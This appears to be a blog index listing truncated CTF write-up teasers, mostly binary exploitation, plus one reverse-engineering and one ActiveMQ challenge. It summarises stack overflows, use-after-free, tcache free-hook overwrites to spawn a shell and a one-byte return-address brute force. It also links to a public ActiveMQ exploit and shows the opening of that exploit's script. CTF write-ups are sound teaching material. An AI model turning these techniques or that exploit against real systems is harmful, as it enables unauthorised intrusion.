nyyyddddn


osu!gaming_CTF_2024
pwn
betterthanufgets
There's an overflow here: overwrite v6 with 727, and all that is needed is for v5 to be smaller than v6.
int __cdecl main(int argc, const char **argv, const char **envp){ char s[16]; // [rsp+0h] [rbp-20h] BYREF unsigned __int64 v5; // [rsp+10h] [rbp-10h] unsigned int v6; // [rs...
hgame2024week3_wp
pwn
你满了,那我就漫出来了! [supplement]
int __cdecl __noreturn main(int argc, const char **argv, const char **envp){ unsigned int v3; // [rsp+4h] [rbp-Ch] BYREF unsigned __int64 v4; // [rsp+8h] [rbp-8h] v4 = __readfsqword(0x28u); init(argc, ...
sictfr3_pwn_wp
pwn
[warm-up] stack
The challenge logic is this: essentially you need to find a number much larger than 0x58 whose low byte is less than 0x40, and then you can overflow.
char *run(){ char buf[76]; // [rsp+0h] [rbp-50h] BYREF size_t nbytes; // [rsp+4Ch] [rbp-4h] printf("Give me the length: "); LODWORD(nbytes) = get_int(); if ( (unsigned __int8)nbytes > 0x40u )...
nssr18_wp
Ugh, I'm so bad, I only solved one challenge.
HappyCTF
public vuln vuln proc near buf= byte ptr -110h var_8= qword ptr -8 ; __unwind { endbr64 push rbp mov rbp, rsp sub rsp, 110h lea rax, aNowPlzYouInput ; "Now,plz you input:" mov rdi, rax ; s call ...
hgame2024week2_pwn_wp
pwn
Elden Ring Ⅱ
A heap-manager challenge on glibc 2.31 with no PIE; it offers four functions (add, edit, show, delete), and there is a UAF in delete.
void delete_note(){ unsigned int v0; // [rsp+Ch] [rbp-4h] BYREF printf("Index: "); __isoc99_scanf("%u", &v0); if ( v0 <= 0xF ) { i...
0xl4ugh_pwn
pwn
pwn1
glibc 2.31 with PIE. Choice 10 can allocate a very large chunk, so the idea is to fill up tcache, then free a large chunk and leak the libc address via the unsorted bin, then use a tcache bin attack to write the free hook to system, and finally free a chunk whose contents are binsh to trigger system(/bin/sh).
...
hgame2024week1_wp
re
ezASM
From checkflag you can see that the cmp logic is an XOR with 0x22.
section .data c db 74, 69, 67, 79, 71, 89, 99, 113, 111, 125, 107, 81, 125, 107, 79, 82, 18, 80, 86, 22, 76, 86, 125, 22, 125, 112, 71, 84, 17,...
beginctf2024_wp
pwn
one_byte
It can overwrite exactly one byte of the return address. Looking at it, the return address is a libc address, 29dxx. I read through the assembly near 29dxx and there is no direct output function, nor any assembly that jumps to an output function. So the idea at that point was to brute-force that one byte, record every byte value that produced output, and in the end I found that at \x89 it returns to main and prints the next flag character.
.text:0000000000029D89 48 8B 44 24 08 mov rax, [rsp+98h+var_90] .text:0000000000029D8E FF D0 ...
rw体验赛wp
Ugh, I'm so bad, I only solved two challenges; I spent ages debugging the ghostscript one and never got it working.
Be-an-ActiveMq-Hacker
I searched around and got through with an exploit found online: https://blog.csdn.net/weixin_49125123/article/details/135577221
import io import socket import sys def main(ip, port, xml): classname = "org.springframewor...
nssctfr16_wp
pwn
nc_pwnre
An XOR routine; after the XOR it is a base64 string, and submitting the decoded text drops you into the shell.
a = [0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d] for i in a: print(chr(i ^ 0x10),...